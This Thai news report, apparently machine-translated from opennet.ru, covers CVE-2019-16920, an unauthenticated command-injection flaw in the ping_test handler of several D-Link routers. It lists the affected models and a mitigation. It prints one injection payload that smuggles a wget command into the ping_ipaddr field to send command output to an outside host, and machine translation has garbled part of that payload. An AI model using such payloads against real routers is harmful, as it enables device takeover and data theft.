ช่องโหว่ที่สามารถหาประโยชน์ได้จากระยะไกลในเราเตอร์ D-Link

ในเราเตอร์ไร้สาย D-Link ระบุ ความเปราะบางที่เป็นอันตราย (CVE-2019–16920) ซึ่งช่วยให้คุณสามารถรันโค้ดจากระยะไกลทางฝั่งอุปกรณ์โดยการส่งคำขอพิเศษไปยังตัวจัดการ “ping_test” ซึ่งสามารถเข้าถึงได้โดยไม่ต้องมีการตรวจสอบสิทธิ์

ที่น่าสนใจตามที่นักพัฒนาเฟิร์มแวร์ระบุว่าการเรียก "ping_test" ควรดำเนินการหลังจากการตรวจสอบสิทธิ์เท่านั้น แต่ในความเป็นจริงแล้วจะมีการเรียกไม่ว่าในกรณีใด ๆ โดยไม่คำนึงถึงการเข้าสู่เว็บอินเตอร์เฟส โดยเฉพาะอย่างยิ่งเมื่อเข้าถึงสคริปต์ Apply_sec.cgi และส่งพารามิเตอร์ "action=ping_test" สคริปต์จะเปลี่ยนเส้นทางไปยังหน้าการตรวจสอบสิทธิ์ แต่ในขณะเดียวกันก็ดำเนินการที่เกี่ยวข้องกับ ping_test ในการรันโค้ด มีการใช้ช่องโหว่อื่นใน ping_test เอง ซึ่งเรียกใช้ยูทิลิตี้ ping โดยไม่ตรวจสอบความถูกต้องของที่อยู่ IP ที่ส่งไปทดสอบอย่างถูกต้อง ตัวอย่างเช่น หากต้องการเรียกใช้ยูทิลิตี้ wget และถ่ายโอนผลลัพธ์ของคำสั่ง “echo 1234” ไปยังโฮสต์ภายนอก เพียงระบุพารามิเตอร์ “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( เสียงสะท้อน 1234)"

ช่องโหว่ที่สามารถหาประโยชน์ได้จากระยะไกลในเราเตอร์ D-Link

การมีอยู่ของช่องโหว่ได้รับการยืนยันอย่างเป็นทางการในรูปแบบต่อไปนี้:

  • DIR-655 พร้อมเฟิร์มแวร์ 3.02b05 หรือเก่ากว่า
  • DIR-866L พร้อมเฟิร์มแวร์ 1.03b04 หรือเก่ากว่า
  • DIR-1565 พร้อมเฟิร์มแวร์ 1.01 หรือเก่ากว่า
  • DIR-652 (ไม่มีข้อมูลเกี่ยวกับเวอร์ชันเฟิร์มแวร์ที่มีปัญหา)

ระยะเวลาการสนับสนุนสำหรับรุ่นเหล่านี้หมดลงแล้ว ดังนั้น D-Link เขากล่าวว่าซึ่งจะไม่ปล่อยการอัปเดตเพื่อกำจัดช่องโหว่ ไม่แนะนำให้ใช้และแนะนำให้เปลี่ยนอุปกรณ์ใหม่ วิธีแก้ปัญหาด้านความปลอดภัย คุณสามารถจำกัดการเข้าถึงเว็บอินเทอร์เฟซให้อยู่เฉพาะที่อยู่ IP ที่เชื่อถือได้เท่านั้น

ต่อมาได้มีการค้นพบช่องโหว่ดังกล่าวอีกด้วย ส่งผลกระทบ รุ่น DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 และ DIR-825 มีแผนจะปล่อยอัปเดตซึ่งยังไม่ทราบ

ที่มา: opennet.ru

เพิ่มความคิดเห็น